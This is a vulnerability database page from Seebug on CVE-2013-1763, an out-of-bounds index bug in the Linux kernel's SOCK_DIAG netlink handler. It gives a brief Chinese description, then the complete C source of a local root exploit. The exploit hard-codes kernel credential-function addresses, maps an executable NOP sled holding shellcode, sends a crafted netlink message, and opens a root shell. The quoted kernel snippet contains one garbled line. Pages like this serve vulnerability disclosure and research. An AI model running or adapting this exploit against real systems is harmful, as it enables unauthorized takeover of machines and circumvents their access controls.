Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit

2014-07-0100:00:00

warl0ck

www.seebug.org

0.001 Low

EPSS

Percentile

24.1%

JSON

影响范围：Linux Kernel 3.3-3.8 CVE-ID：CVE-2013-1763Linux内核处理netlink协议时，存在一处内存越界访问，成功利用可执行任意代码，进行本地提权。漏洞代码如下：static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh){ int err; struct sock_diag_req *req = NLMSG_DATA(nlh); struct sock_diag_handler *hndl; if (nlmsg_len(nlh) < sizeof(*req)) return -EINVAL; hndl = sock_diag_lock_handler(req->sdiag_family); sock_diag_handlers[reg->sdiag_family]. if (hndl == NULL) err = -ENOENT; else err = hndl->dump(skb, nlh); sock_diag_unlock_handler(hndl); return err;}sock_diag_lock_handler数组没有检查上边界，导致通过构造参数可以控制hndl指针。


                                                /* 
* quick&#39;n&#39;dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
* bug found by Spender
* poc by SynQ
* 
* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
* using nl_table-&#62;hash.rehash_time, index 81
* 
* Fedora 18 support added
* 
* 2/2013
*/

#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;

int __attribute__((regparm(3))) kernel_code()
{
        commit_creds(prepare_kernel_cred(0));
        return -1;
}

int main(int argc, char*argv[])
{
        int fd;
        unsigned family;
        struct {
                struct nlmsghdr nlh;
                struct unix_diag_req r;
        } req;
        char  buf[8192];

        if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
                printf("Can't create sock diag socket\n");
                return -1;
        }

        memset(&req, 0, sizeof(req));
        req.nlh.nlmsg_len = sizeof(req);
        req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
        req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
        req.nlh.nlmsg_seq = 123456;

        req.r.udiag_states = -1;
        req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;


        commit_creds = (_commit_creds) 0xc106bc60;
        prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
        req.r.sdiag_family = 81;

        unsigned long mmap_start, mmap_size;
        mmap_start = 0x10000;
        mmap_size = 0x120000;
        printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);

        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
                                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
                printf("mmap fault\n");
                exit(1);
        }
        memset((void*)mmap_start, 0x90, mmap_size);

        char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3";
        unsigned long *asd = &jump[4];
        *asd = (unsigned long)kernel_code;

        memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));

        if ( send(fd, &req, sizeof(req), 0) < 0) {
                printf("bad send\n");
                close(fd);
                return -1;
        }

        printf("uid=%d, euid=%d\n",getuid(), geteuid() );

        if(!getuid())
                system("/bin/sh");
}

0.001 Low

EPSS

Percentile

24.1%

JSON

Related for SSV:86561